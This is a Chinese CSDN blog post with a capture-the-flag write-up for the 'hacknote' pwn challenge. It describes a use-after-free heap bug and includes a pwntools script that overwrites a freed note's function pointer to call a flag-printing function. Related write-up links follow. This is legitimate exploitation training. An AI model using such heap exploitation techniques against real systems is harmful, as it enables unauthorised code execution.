pwn hacknote

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量394 收藏
点赞数
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/102781191
版权

这道题增加堆块会将printf函数的got表地址和将要打印的地址放入一个申请的堆块里面存在uaf漏洞可以先创建2个堆块然后释放申请0x8大小的堆块根据堆分配的原则我们先使用1的第一个然后使用0的第一个然后就修改了指针指向读到flag的函数即可
exp:

from pwn import *
p=process('./hacknote')
elf=ELF('./hacknote')
def debug():
	gdb.attach(p)


def add(size,content):
	p.recvuntil(':')
	p.sendline('1')
	p.recvuntil(':')
	p.sendline(str(size))
	p.recvuntil(':')
	p.sendline(content)

def delete(idx):
	p.recvuntil(':')
	p.sendline('2')
	p.recvuntil(':')
	p.sendline(str(idx))

def printf(idx):
	p.recvuntil(':')
	p.sendline('3')
	p.recvuntil(':')
	p.sendline(str(idx))

#debug()
add(0x18,'aaaa')  #idx 0
add(0x18,'bbbb')  #idx 1
delete(0)
delete(1)

#printf(0)
add(8,p32(0x08048986))
printf(0)


p.interactive()
doudoudedi
关注
专栏目录
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 636
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1081
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 450
回顾经典老题。一、
[BUUCTF]-PWN:pwnable_hacknote解析
最新发布
2301_79326813的博客
01-29 354
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
pwn学习——UseAfterFree hacknote
MrTreebook的博客
11-28 270
pwn学习——UseAfterFree hacknote1. 反编译看一下源代码2.add_note3.print_note4.del_note5.exp6.运行结果 1. 反编译看一下源代码 可以看到大概有四个功能 add del print menu 另外还有后门函数magic 2.add_note 可以看到在添加note的时候,每一个note有两个部分 第一个部份是一个put函数 第二个部分存放的是real_content 一个note节点内部结构是这样的 3.print_note 调用pu
(攻防世界)(pwnhacknote
PLpa的博客
07-31 3425
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
uaf pwn hacknote
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应...
hacknote--PWN的堆入门
Jason_ZhouYetao的博客
02-24 1237
第一步还是进行逆向的功能分析,顺便观察有无敏感函数,诸如:/bin/sh、cat flag等等   看了看发现还真的有,那这个题目就大大得简化了,接下来进行进一步的逆向分析:   add_note: unsigned int add_note() { _DWORD *v0; // ebx signed int i; // [esp+Ch] [ebp-1Ch] int siz...
[XCTF-pwn] 28_hacknote
weixin_52640415的博客
03-09 281
UAF漏洞,有函数指针,覆盖函数指针。 有add,show,free三个函数,有管理块8字节存puts用函数和数据块指针,free未清理指针有UAF,show直接调用管理块函数指针 unsigned int m1add() { int v0; // ebx int i; // [esp+Ch] [ebp-1Ch] int size; // [esp+10h] [ebp-18h] char buf[8]; // [esp+14h] [ebp-14h] BYREF unsigned i
BUUCTF Hacknote
qq_51821131的博客
12-03 2551
Hacknote 分析过程 检查一下保护,无pie,32位,谨记啊,程序的位数,这次就吃亏了 明显的堆题,不过这次没有edit函数 Add函数,最多创建5个堆,先malloc一个0x10的堆,然后把上面函数的地址赋给第一位,第二字赋给我们即将创建的size大小的堆 Free函数,输入index,free对应堆块,只是这里没有对指针进行清零,存在UAF漏洞 Dump函数通过指针调用,一看就可以泄露 整理一下思路,我们可以通过创建2个大于0x10大小的堆,然后free掉他们,然后申请一个0x10的堆
hacknote了解UAF漏洞
weixin_44864859的博客
07-07 666
首先查看程序的基本功能,基本的菜单形式,主要提供了三个功能,创建,删除,打印。(即malloc堆块,free堆块,printf堆块中的数据) 查看程序基本信息 拖进ida中进行伪代码审计,由于此题没有去掉符号表,因此审计相对比较简答。创建和打印部分的代码均没有什么漏洞,在删除功能处可以发现很明显的UAF漏洞,在free掉content指针和结构体指针后均没有将其置为NULL。 另外可以找到程序中存在后门函数magic 进行调试分析,首先创建两个note(note0和note1),大小都为0x10,g
第二届“祥云杯”pwn_note
孤勇傻兔的博客
12-23 1664
这题是格式化字符串漏洞 + House Of Orange + __malloc_hook 组合利用,难度倒也不是很难,对于我这种新手学到了不少东西。 但是我觉得这里并不是的格式化字符串漏洞,倒不如说是故意构造的逻辑漏洞,姑且称它为格式化字符串漏洞吧。 思路: house of orange:通过修改 top chunk 的 size,来触发 brk 扩展堆段,之后原有的 top chunk 会被置于 unsorted bin 中。本题再直接 show 泄露 main_arena 计算偏移得到 libc。
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 532
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
pwnable_hacknote
m0_73756460的博客
02-22 178
buu刷题pwnable_hacknote【wp】
pwnable.tw——hacknote
40KO的博客
02-24 846
很少做pwn,之前也只懂点rop,现在跟着练练pwn的堆利用吧,pwnable.tw上的一题hacknote,比较纯粹的uaf题目,还好不久前看了点glibc内存管理的东西,可以派上用场了。 逆向很轻松,那为什么不直接给源码呢。。。根据add_note函数很容易了解note的结构体特征 unsigned int add_node() { note *v0; // ebx signed...
2021 祥云杯 pwn-note
z1r0的博客
10-14 380
在第一个图那里下个断点,查看stack时发现%11$p这里有一个stdout,这个给了我们泄露libc的机会,我们可以打stdout的flag和write_ptr,具体的可以看别的师傅对stdout泄露libc分析的文章。偏移为7, 这里笔者用的ubuntu20.04的2.31libc做的,不需要利用realloc来调整可以直接利用,题目给的libc需要利用realloc来调整一下即可。拿到libc之后,算出ogg,ogg出来了,可以再利用scanf任意地址写打malloc为ogg。
2021 祥云杯 pwn note
yongbaoii的博客
08-30 344
保护全开 功能1 可以申请chunk,然后会给chunk地址。 功能2 功能2有一个scanf的任意写。 功能3是一个输出。 利用的就是scanf的任意写。 我们知道scanf会把我们的输入的字符串当成第一个参数,如果还有需要,会先从五个寄存器去找,然后再去找栈中的数据,那我们也去看一下寄存器或者栈上的数据有没有可以利用的。 偏移8的地方显然有一个_IO_2_1_stdout_地址,所以我们可以把他当作参数做一个任意写,劫持_IO_FILE然后泄露libc,再来一次把malloc_hook地址写上去,
hacknote 攻防世界
qq_41071646的博客
05-18 526
这个题我以前做过 只不过这次没有了后门函数 下面这个链接是我以前做的题的链接 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/ 有了上次的经验 这次做的还比较顺利 思路其实差不多的 from pwn import* io=remote("111.198.29.45",52641) #io=p...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值